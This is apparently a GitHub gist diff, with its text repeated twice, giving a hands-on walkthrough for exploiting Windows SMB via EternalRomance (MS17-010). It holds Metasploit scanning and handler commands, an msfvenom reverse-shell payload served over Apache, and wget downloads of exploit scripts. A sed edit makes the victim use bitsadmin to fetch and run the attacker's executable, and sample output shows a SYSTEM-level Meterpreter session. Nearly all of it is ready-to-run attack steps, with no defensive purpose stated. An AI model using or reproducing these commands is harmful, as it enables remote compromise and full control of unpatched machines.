xillwillx · September 19, 2018 19:03
diff --git a/gistfile1.txt b/gistfile1.txt
 # Test victim IP first to see if exploitable
 msfconsole
 use auxiliary/scanner/smb/pipe_auditor
 set RHOSTS 192.168.128.19 
 exploit

 #*choose pipe name 'netlogon'

 ######Exploiting the Victim##########
 # Setup Meterpreter Handler
 IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
 touch meterpreter.rc
 echo use exploit/multi/handler >> meterpreter.rc
 echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
 echo set LHOST $IP >> meterpreter.rc
 echo set ExitOnSession false >> meterpreter.rc
 echo exploit -j -z >> meterpreter.rc
 cat meterpreter.rc
 msfconsole -r meterpreter.rc


 # in a new tab Create Meterpreter payload in www dir
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe

 # Start Webserver
 service apache2 start

 # Grab Exploit Scripts and SED the script to add out meterpreter payload instead
 IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
 wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
 wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
 sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" EternalRomance.py
 sed -i -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

 ##################################
 # Exploit that motherfucker (change the ip obviously)
 python EternalRomance.py 192.168.128.19 netlogon



 Result should give you a meterpreter shell
 [*] Sending stage (957487 bytes) to 192.168.128.19
 [*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
 msf exploit(handler) > sessions -i 1
 [*] Starting interaction with 1...
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
	# Test victim IP first to see if exploitable
	msfconsole
	use auxiliary/scanner/smb/pipe_auditor
	set RHOSTS 192.168.128.19
	exploit

	#*choose pipe name 'netlogon'

	######Exploiting the Victim##########
	# Setup Meterpreter Handler
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	touch meterpreter.rc
	echo use exploit/multi/handler >> meterpreter.rc
	echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
	echo set LHOST $IP >> meterpreter.rc
	echo set ExitOnSession false >> meterpreter.rc
	echo exploit -j -z >> meterpreter.rc
	cat meterpreter.rc
	msfconsole -r meterpreter.rc


	# in a new tab Create Meterpreter payload in www dir
	msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe

	# Start Webserver
	service apache2 start

	# Grab Exploit Scripts and SED the script to add out meterpreter payload instead
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
	wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
	sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" EternalRomance.py
	sed -i -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

	##################################
	# Exploit that motherfucker (change the ip obviously)
	python EternalRomance.py 192.168.128.19 netlogon



	Result should give you a meterpreter shell
	[*] Sending stage (957487 bytes) to 192.168.128.19
	[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
	msf exploit(handler) > sessions -i 1
	[*] Starting interaction with 1...
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM